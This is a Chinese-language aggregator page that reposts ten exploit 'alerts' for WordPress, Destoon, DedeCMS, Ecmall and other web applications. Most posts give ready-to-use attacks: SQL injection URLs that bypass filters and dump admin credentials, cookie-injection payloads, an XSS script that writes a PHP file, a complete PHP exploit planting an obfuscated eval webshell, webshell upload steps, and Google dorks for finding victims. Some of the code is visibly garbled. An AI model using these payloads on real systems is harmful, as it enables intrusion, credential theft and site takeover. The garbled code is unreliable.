Wp暴目录漏洞全版本通杀漏洞预警

“消毒酒精”为你分享10篇“Wp暴目录漏洞全版本通杀漏洞预警”，经本站小编整理后发布，但愿对你的工作、学习、生活带来方便。

篇1：Wp暴目录漏洞全版本通杀漏洞预警

缺陷文件:

http://www.xxxo.com/{Path}/wp-includes/registration-functions.php

关键代码 :

---->

/**

* Deprecated. No longer needed.

*

* @package WordPress

*/_deprecated_file( basename(__FILE__), '2.1', null, __( 'This file no longer needs to be included.' ) );

?>

----->

本文由( 0day5 )原创编译

​

篇2：wordpress暴目录漏洞全版本通杀漏洞预警

缺陷文件:

http://Localhost/{Path}/wp-includes/registration-functions.php

关键代码 :

—->

/**

* Deprecated. No longer needed.

*

* @package WordPress

*/

_deprecated_file( basename(__FILE__), ’2.1′, null, __( ‘This file no longer needs to be included.’ ) );

?>

—–>

测试:

=============

随便测试了几个大牛. 基本都中枪.

篇3：destoon 全版本SQL注入漏洞漏洞预警

在include/global.func.php 中strip_sql函数对传进来的值进行了过滤，但是我们可以绕过该限制，达到全版本注入

function strip_sql($string) {

$search = array(“/union[s|t]/i”,“/select[s|t]/i”,“/update[s|t]/i”,“/outfile[s|t]/i”,“/ascii/i”,“/[s|t]or[s|t]/i”,“//*/i”);

$replace = array('union ','select ','update ','outfile ','ascii ',' or ', '');

return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);

}

在member/record.php 中

require 'config.inc.php';

require '../common.inc.php';

require DT_ROOT.'/module/'.$module.'/record.inc.php';

?>

调用了record.inc.php

switch($action) {

case 'pay':

$MODULE[-9]['name'] = $L['resume_name'];

$MODULE[-9]['islink'] = 0;

$MODULE[-9]['linkurl'] = $MODULE[9]['linkurl'];

isset($fromtime) or $fromtime = '';

isset($totime) or $totime = '';

isset($dfromtime) or $dfromtime = '';

isset($dtotime) or $dtotime = '';

isset($mid) or $mid = 0;

isset($currency) or $currency = '';

$module_select = module_select('mid', $L['module_name'], $mid);

if($keyword) $condition .= “ AND title LIKE '%$keyword%'”;

if($fromtime) $condition .= “ AND paytime>”.(strtotime($fromtime.' 00:00:00'));

if($totime) $condition .= “ AND paytime<”.(strtotime($totime.' 23:59:59'));

if($mid) $condition .= “ AND moduleid=$mid”;

if($itemid) $condition .= “ AND itemid=$itemid”;

....//

其中$mid 是没经过过滤的，导致我们可以注入

但是前面有防注入处理？

看我们怎么绕过注入中的正则

http://www.myhack58.com/member/record.php?action=pay&mid=-1+union//***/select//***/1,2,password,username,5,6,7,8,9 from destoon_member where admin=1-- a

看看这样是不是可以了？

这样就达到可以绕过正则了，

destoon 全版本SQL注入漏洞漏洞预警

，

。。

当前。前缀肯定是有变化的了,我看使用

http://www.myhack58.com/member/record.php?action=pay&mid=-1+union//***/select//***/1,2,GROUP_CONCAT(DISTINCT+table_name),4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database--%20a

来获取前缀。再使用

http://www.myhack58.com/member//record.php?action=pay&mid=-1+union//***/select//***/1,2,concat(username,0x3A,password),4,5,6,7,8,9%20from%20destoon_member%20where%20admin=1--%20a

来获得帐号和密码，密文为md5(md5(psw))类型，后台貌似为admin.php

篇4：DEDECMS xss 0day 通杀所有版本漏洞预警

漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行，可getshell

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。

条件有2个：

1.开启注册

2.开启投稿

注册会员—-发表文章

内容填写：

新建xss.css,内容:

body{

background-image:url(´javascript.:document.write(“”)´)

}

新建xss.js文件,内容:

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType(´text/xml´);

}

} else if(window.ActiveXObject) {

var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

function getFolder( url ){

bj = url.split(´/´)

return obj[obj.length-2]

}

Url = top.location.href;

u = getFolder(oUrl);

add_admin();

function add_admin(){

var url= “/”+u+“/sys_sql_query.php”;

var params =“fmdo=edit&backurl=&activepath=/data&filename=haris.php&str=

篇5：简单文章管理系统 cookie注入漏洞通杀所有版本漏洞预警

简单文章管理系统采用一级分类，界面简洁，功能简单实用，删除文章后，文章相关图片也一并删除减

少垃圾文件的存在。

后台管理入口http://域名/admin 用户名和密码都是admin

后台模块：

信息管理: 发布信息 修改信息 查找信息 推荐信息

系统管理: 类别管理 用户管理 系统设置 数据库维护

漏洞文件：article.asp Check_SqlIn.asp 代码我就不作分析了。网上多的是，差不多的问题。

漏洞说明：过滤不严，导致可cookie注入。

好像有两个字段14和12。

exp:

javascript.:alert(document.cookie=”id=“+escape(”119 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin“));

javascript.:alert(document.cookie=”id=“+escape(”235 union select 1,2,3,user,5,password,7,8,9,10,11,12 from admin“));

利用方法我就不说了，网上很多，整天JJYY还是这点破事，

有图有真像：

拿shell方法：

暂时没有更好的办法，但是如果他的数据库是.asp .asa后缀的话，可在

http://www.xxx.com/data/!%article%!.asp

改变下成:http://www.xxx.com/data/%21%25article%25%21.asp

没对数据库访问进行处理。 ING~~~~~~~

用户管理--->增加管理员中 帐户写上一句话变型马。然后菜刀之类的连就可以了。

dork:

inurl:list.asp?classid=1 首页 上一页 下一页 尾页 页次：页 共 条记录 条记录/页 转到：

注意后面的字哦。。。^_^

From: www.0855.tv

By: Mr.DzY

篇6：YothCMS 遍历目录漏洞漏洞预警

优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS！YothCMS是由石家庄优斯科技有限公司

开发的一套完全开源建站系统，主要面向企业进行快速的建造简洁，高效，易用，安全的公司企业网门户

站，稍具技术的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能

齐全、性能优越的公司企业网站，YothCMS是基于ASP+Access开发的一款轻巧高效的网站内容管理系统，

提供了新闻管理模块，产品管理模块，文件管理模块，

在使用过程中可以轻松搭建一个功能丰富的网站。

下载地址:http://www.mycodes.net/25/4562.htm

默认后台:admin/login.asp

遍历目录:

ewebeditor/manage/upload.asp?id=1&dir=../

test:

http://www.flycn.net/ewebeditor/manage/upload.asp?id=1&dir=../

篇7：IE浏览器鼠标坐标跟踪安全风险,通杀全版本漏洞预警

最近在Seclist上又看到了IE漏洞，该漏洞的主要影响是能够跟踪鼠标坐标位置，即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。 影响版本:IE6-10

Code:

Exploit Demo

篇8：dede5.5 通杀 ODAY漏洞预警

官方暂时没出补丁,不过我估计快了 执行成功会在在data/cache下生成t.php一句话小马密码t, 官方最新GBK和utf-8版本存在此漏洞, 此exp得特点是生产t.php得时候不留日志 ?php print_r(' +----------------------------------------+ dedecms v5.5 final getwebs

官方暂时没出补丁,不过我估计快了

执行成功会在在data/cache下生成t.php一句话小马密码t,

官方最新GBK和utf-8版本存在此漏洞,

此exp得特点是生产t.php得时候不留日志

print_r('

+----------------------------------------+

dedecms v5.5 final getwebshell exploit

+----------------------------------------+

');

if ($argc < 3) {

print_r('

+----------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to dedecms

Example:

php '.$argv[0].' localhost /dedecms/

+----------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';

$post_b = 'needCode=aa/../../../data/mysql_error_trace';

$shell = 'data/cache/t.php';

get_send($post_a);

post_send('plus/comments_frame.php',$post_b);

$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){

echo ”nShell Address is:“.$host.$path.$shell;

}else{

echo ”nError.“;

}

function get_send($url){

global $host, $path;

$message = ”GET “.$path.”$url HTTP/1.1rn“;

$message .= ”Accept: */*rn“;

$message .= ”Referer: http://$host$pathrn“;

$message .= ”Accept-Language: zh-cnrn“;

$message .= ”Content-Type: application/x-www-form-urlencodedrn“;

$message .= ”User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn“;

$message .= ”Host: $hostrn“;

$message .= ”Connection: Closernrn“;

$fp = fsockopen($host, 80);

if(!$fp){

echo ”nConnect to host Error“;

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

function post_send($url,$cmd){

global $host, $path;

$message = ”POST “.$path.”$url HTTP/1.1rn“;

$message .= ”Accept: */*rn“;

$message .= ”Referer: http://$host$pathrn“;

$message .= ”Accept-Language: zh-cnrn“;

$message .= ”Content-Type: application/x-www-form-urlencodedrn“;

$message .= ”User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn“;

$message .= ”Host: $hostrn“;

$message .= ”Content-Length: “.strlen($cmd).”rn“;

$message .= ”Connection: Closernrn“;

$message .= $cmd;

$fp = fsockopen($host, 80);

if(!$fp){

echo ”nConnect to host Error“;

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

?>

篇9：桃园网盘通杀批量getshell漏洞预警

出处论坛：法客论坛《http://team.f4ck.net》

首发博客：疯子博客《http://Madman.in》

作者：鬼魅羊羔

谷歌关键字：inurl:guest_ly.aspx

第一：先看是否有可以测试的“guest”账户

如果有，点击 文件管理→上传→然后上传ashx马

上传之后马的路径在，

http://Madman.in/myfile/guest/madman.ashx

guest是账户

myfile 是默认的上传文件保存目录

这个madman.ashx，执行后，会在同目录下生成一个root.asp的一句话，执行完成后，果断菜刀连接……

连接方式

http://Madman.in/myfile/guest/root.asp

密码：root

这个马我后面打包

如果没有测试账户

那如果开启注册 就自己注册一个 也是这样 拿shell

或者不给注册 如果有原来的 你也可以社试一下

http://MADMAN.in/search_user.aspx

全部账户名称的用户名在这里

篇10：Ecmall 2.x版本存在通杀SQL注入漏洞漏洞预警

简要描述：

本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错...

详细说明：

order by 参数注入,后面不能跟union,但是可以用双重查询.

select...from...order by 1 and (select user_name from ecm_member where user_id=1)

或者

select...from...order by 1,(select user_name from ecm_member where user_id=1)

但是在第2个select里面可以用union

select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)

或

select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)

app/my_goods.app.php

function index()

{

/* 取得店铺商品分类 */

$this->assign('sgcategories', $this->_get_sgcategory_options());

$conditions = $this->_get_conditions();

$page = $this->_get_page();

$page_nolimit = array();

$goods_list = $this->_get_goods($conditions, $page); //跟进

$all_goods = $this->_get_goods($conditions, $page_nolimit);

......

}

function _get_goods($conditions, &$page)

{

if (intval($_GET['sgcate_id']) > 0)

{

$cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id));

$cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));

}

else

{

$cate_ids = 0;

}

// 标识有没有过滤条件

if ($conditions != '1 = 1' || !empty($_GET['sgcate_id']))

{

$this->assign('filtered', 1);

}

//更新排序

if (isset($_GET['sort']) && isset($_GET['order']))

{

0 = strtolower(trim($_GET['sort'])); //未过滤

$order = strtolower(trim($_GET['order']));

if (!in_array($order,array('asc','desc'))) //只限制了order,没有限制sort

{

0 = 'goods_id';

$order = 'desc';

}

}

else

{

0 = 'goods_id';

$order = 'desc';

}

if ($page)

{

$limit = $page['limit'];

$count = true;

}

else

{

$limit = '';

$count = false;

}

/* 取得商品列表 */

$goods_list = $this->_goods_mod->get_list(array(

'conditions' => $conditions,

'count' => $count,

'order' => ”0 $order“, //select...from...order by 注入

'limit' => $limit,

), $cate_ids);

return $goods_list;

}

includes/models/goods.model.php

function get_list($params = array(), $scate_ids = array(), $desc = false, $no_picture = true)

{

is_int($scate_ids) && $scate_ids > 0 && $scate_ids = array($scate_ids);

extract($this->_initFindParams($params));//将上面数组的键名作为变量名,值作为变量的值(包含$order变量).

......

/* 条件(WHERE) */

$conditions = $this->_getConditions($conditions, true);

$conditions .= ” AND gs.spec_id IS NOT NULL AND s.store_id IS NOT NULL “;

if ($scate_ids)

{

......

}

/* 排序(ORDER BY) */

if ($order)

{

$order = ' ORDER BY ' . $this->getRealFields($order) . ', s.sort_order '; //跟进

}

/* 分页(LIMIT) */

$limit && $limit = ' LIMIT ' . $limit;

if ($count)

{

$this->_updateLastQueryCount(”SELECT COUNT(*) as c FROM {$tables}{$conditions}“);

}

/* 完整的SQL */

$this->temp = $tables . $conditions;

$sql = ”SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}“;

$goods_list = $index_key ? $this->db->getAllWithIndex($sql, $index_key) : $this->db->getAll($sql); //带入查询

......

}

eccore/model/model.base.php

function getRealFields($src_fields_list)

{

$fields = $src_fields_list;

if (!$src_fields_list)

{

$fields = '';

}

$fields = preg_replace('/([a-zA-Z0-9_]+).([a-zA-Z0-9_*]+)/e', ”$this->_getFieldTable('1') . '.2'", $fields); //正则无影响...

return $fields;

}

http://localhost/ecmall/index.php?app=my_goods&act=index&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23

漏洞证明：

★ 企业网站后台安全防范的基本方法介绍

★ FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警

★ 微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警

★ 有道Chrome浏览器划词插件xss漏洞漏洞预警

★ AWStats 6.4及以下版本多个漏洞以及分析

★ 扩展思维新方法后台拿shell

★ dedecms 补出来的一个鸡肋漏洞漏洞预警

★ Ginwui后门程序分析

★ WordPress简单安全设置

★ BBSXP,很多注入脚本安全

《Wp暴目录漏洞全版本通杀漏洞预警.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

【Wp暴目录漏洞全版本通杀漏洞预警（精选10篇）】相关文章：

安卓应用商店用户调查报告2023-03-01

如何修复被挂木马的php网站WEB安全2023-02-11

心海学校心理管理系统Xday漏洞预警2022-08-24

DeDeCMS批量修改文章动态发布，生成静态2023-08-26

Geeklog SECauthenticate函数SQL注入漏洞2022-12-16

Z-Blog多服务器平衡负载的方法2022-05-06

Linux操作系统中的防火墙技术及其应用2023-10-12

Z-Blog反垃圾留言过滤插件2022-05-06

无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全2023-12-29

对一个网站进行渗透的过程2022-04-29